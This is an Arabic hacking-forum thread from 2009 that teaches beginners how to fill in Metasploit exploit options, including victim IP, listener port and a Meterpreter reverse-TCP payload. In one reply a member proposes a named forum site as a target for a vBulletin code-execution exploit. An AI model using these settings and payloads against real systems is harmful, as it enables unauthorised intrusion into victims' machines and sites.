[الدرس الثالث]ادخال معلومات الهدف الى خيارات الثغرة(مهم)

المجهووول · 09-19-2009, 03:57 PM

بسم الله الرحم الرحيم
السلام عليكم ورحمة الله وبركاتة

اليوم درسنا الدرس الثالث ان شاء الله رح يكون عن ادخال معلومات الهدف في خيارات الثغرة لأستغلالها بالشكل الصحيح
نبدأ على طول على بركة الله .. للعلم هذا الدرس اساسي في اعتمادك على الاختراق وهو يعتمد في عملية الاستهداف على 99% اذا لم يكن 100%
اول امر وهو

كود PHP:

set

تطرقنا له في الدرس الثاني .. لأظهار خيارات الثغرة show options وهذا الامر موضح بالدرس السابق ..وبهذا الامر تستطيع معرفة ماذا ستستعملانظر تحت v_v
نشوف الآن كيف يكون الامر

كود PHP:

  set LHOST 192.168.1.151

يستخدم لادخال اي بي جهازنا ضمن خيارات الثغرة لتصنت عن طريقة او وصول تبليغ

كود PHP:

  set RHOST 192.168.5.110

يستخدم هذا ايضا لادخال اي بي جهاز الضحية يعني باختصار ي بي الهدف

كود PHP:

  set LPORT 4444

ادخال البورت الذي ستستخدمه في التصنت ولك الحق بوضع اي رقم بورت تريده وهذا يستخجم في حال انت تستخدم بايلود اتصال عكسي او ثغرة اتصال عكسي reverse

كود PHP:

  set RPORT 192.168.5.151

لأدخال بورت الهدف بتاع الضحية الى خيارات الثغرة ويستخدم هذا في حال الاتصال المباشر bind
###

كود PHP:

  set PAYLOAD windows/meterpreter/reverse_tcp

يستخدم لتحديد البايلود الذي نريد استخدامه في عملية الاختراق وان شاء الله رح يكون درس كامل عن هذه البايلود لخطورتها وسهولة استعمالها وقوتها

كود PHP:

  set PATH /vb/

هنا لتحديد المسار انا وضعت vb لمثال وانما في بعض تطلب مسارات اخرى لكن اللي يهمني هو الدال عليه وهو PATH وهو المسار المراد استخدام بشكل عام بأي ثغرة سواء كان تحديد مسار سكربت او تحديد ملف لأستعماله في الاختراق سواء سيرفر او غيره

كود PHP:

  set VHOST host.com

هنا لتحديد رابط الاستضافة في حال كنا نستهدف موقع نادرا ما تلاقي هذا الخيار

كود PHP:

  set SRVPORT 80

يستخدم لأدخال البورت في حال استخدام احد ثغرات المتصفح .. وهذا الخيار لا ياتي الا في ثغرات المتصفح browser هذا على حسب استعمالي اني لم اجدها في اي ثغرات اخرى غير ثغرات المتصفح وفي هذه الحالة فيك تضع 80 او 8080 او اي بورت غيره
ويلزم يكون البورت الذي تريد وضعه يكون مفتوح عندك ويفضل وضع 80 لانه للمتصف http وانت الان تتصفح انظر فوق اول رابط الموقع مكتوب http وهو بورت 80 اذا اكيد يكون مفتوح تلقائي يعني ما بتشوفه مفتوح بالرواتر هذا على حسب استنباطي

كود PHP:

  set SRVHOST 0.0.0.0

يسخدم ايضا هذا الخيار فقط تلقاه في ثغرات المتصفح هذا تضع به الاي بي جهازك.. واذا تركته مثل ما هو SRVHOST 0.0.0.0 رح يتم الاستغلال تلقائي يعني وضع اي بي جهازك تلقائي فيفضل ان لا تعدل عليه لانه رح يتم تلقائي وضع اي بي جهازك يعني رح تشوفه في خيارات الثغرة هكذا 0.0.0.0

كود PHP:

  set URIPATH arhacker.html

يستخدم هذا الامر لوضع رابط وايضا هذا يستخدم في ثغرات المتصفح يعني يمكن ما تلاقيه بثغرات اخرى << لست متذكر اني لم اجده في ثغرات اخرى

الى هنا ينتهي الدرس بحمد الله
اي استفسار ضعه هنا وان شاء الله يتم الرد واذا لم اكن موجود فألاعضاء ما يقصرون معك بأذن الله
ان شاء الله الدرس الرابع رح اتطرق لانواع البايلود واهميتها ووظيفتها
####
تحياتي
لا للاحتكار
المجهوول

المصدر: :: vBspiders Professional Network ::

Fhg]vs hgehgeDh]ohg lug,lhj hgi]t hgn odhvhj hgeyvm(lil)

741D4r · 09-19-2009, 04:01 PM

حياك الله يالمجهول بارك الله بيك
نور الله دربك

المجهووول · 09-19-2009, 06:35 PM

الله ينورك بأنوار النبي الخير اخي

موفق بمسيرتك وان شاء الله نتعلم انا على ييدك خخ :D
##
تحياتي
لا للاحتكار
المجهوول

ابو بدر · 09-20-2009, 04:36 AM

مشكوووووور واصل تألقك
انتظر كامل الدورة

data$hack · 09-20-2009, 10:43 PM

السلام عليكم بارك الله فيك اخي

KaLa$nikoV · 09-21-2009, 01:48 PM

مشكور يا قلبي على الشرح الرائع والمتميز

واصل ابداعك

malekalnet · 09-26-2009, 02:31 PM

درس قيم الله يعطيك العافيه

ziko90 · 10-01-2009, 05:51 PM

بارك الله فيك اخي

ThE BiGeSt JoKeR · 11-13-2009, 02:57 AM

مشكووووور يا بطل

شرح وااافي و كاااافي و رااائع

اقتباس


	كود PHP: set VHOST host.com هنا لتحديد رابط الاستضافة في حال كنا نستهدف موقع نادرا ما تلاقي هذا الخيار

رووعه

عندي عندي استفسار في مخي مو قادر اخفيه

ليه ادخل رابط موقع الاستضافه
شو فايدته <<<<<سؤال تافه -_- << بررررررررررررى

عندك موقع www.israelforum.com

الثغره unix/webapp/php_vbulletin_template
السكربت او البرنامج
vBulletin misc.php Template Name Arbitrary Code
يعني الابتسامات

شوف الـ show options

تابع ...

ThE BiGeSt JoKeR · 11-13-2009, 02:57 AM

Name Current Setting Required Description
---- --------------- -------- -----------
PATH || /forum/misc.php || yes || Path to misc.php
Proxies || || no || Use a proxy chain
RHOST|| || yes || The target address
RPORT|| 80 || yes || The target port
SSL|| false || || no || Use SSL
VHOST|| || no || HTTP server virtual host

تابع ...

ThE BiGeSt JoKeR · 11-13-2009, 03:03 AM

هي مو مهمه كما في الفقره Required

on

بس اذا كتبت شو بيصير ^^

سؤال غبي صح

بس مدري يعني اذا كتبت الاستضافه اش اللي راح يحصل في الموقع

اذا شايف انه ما له داعي اوك لا تجاوب

و شكرا لعى الدرس ^^

المجهووول · 11-13-2009, 02:20 PM

V host واضحة تعني رابط الاستضافة وتسال ليش هذا يرجع للمصمم الميتا
من ناحيتي رابط الاستضافة لكي تأخذ معلومات حول البورتات وهل مفتوحة لتفذ الغرة وعمل test قبل التجربة
هذا والله اعلم

ThE BiGeSt JoKeR · 11-13-2009, 02:25 PM

اقتباس


	V host واضحة تعني رابط الاستضافة وتسال ليش هذا يرجع للمصمم الميتا من ناحيتي رابط الاستضافة لكي تأخذ معلومات حول البورتات وهل مفتوحة لتفذ الغرة وعمل test قبل التجربة هذا والله اعلم

شكرا لك على التوضيح

تجربه · 11-13-2009, 05:43 PM

بارك الله فيك يامجهول وياليت اللع يعطيك العافيه تشرحلنا بصووره تعرف مبتدا بالميتا ولك الف شكر

المجهووول · 11-16-2009, 10:15 PM

ما اظن يوجد تبسيط اكثر من ذلك
لكن النقطة اللي مش فاهمها قول لي اياها
ولا تنسى تتابع الدروس من اول درس
تحياتي
لا للاحتكار

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
[ الدرس الثالث والعـشرون ] كشف التلغيم واستخراج معلومات الملغم عن طريق برنامج smsniff	SoLiTair4Ever	حمـــاية الأجهــزة وانظمتـــها	0	03-30-2010 07:15 AM

[الدرس الثالث]ادخال معلومات الهدف الى خيارات الثغرة(مهم)

MetaSploit